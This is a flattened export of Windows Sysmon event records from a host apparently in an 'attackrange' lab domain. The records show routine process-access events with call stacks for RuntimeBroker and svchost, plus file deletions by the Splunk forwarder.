12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006808Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006807Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006806Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006805Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006804Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006803Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006802Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006801Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+182c9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11417|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x80000000000000006800Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006799Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+182c9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11417|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000006798Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+182c9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11417|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000006797Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+18280|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11417|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 23542300x80000000000000006796Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.477{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E442FAACD2856549F247FC7B4A8BE785,SHA256=1EECEA8FE35467A27D68EC99B84BB147F12D5581AAF1F3FC198E579E97FDAF92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000006795Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.461{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84896E480252AAD70F5DB90EA4DB6ADB,SHA256=8AD8CFF569AE2AB097D80A95104C98184A5080A781D0E90D151A8ADD67B10B20,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006794Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.399{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006793Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.399{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006792Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.399{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006791Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.399{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006790Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.399{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006789Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.399{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006788Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.399{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006787Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
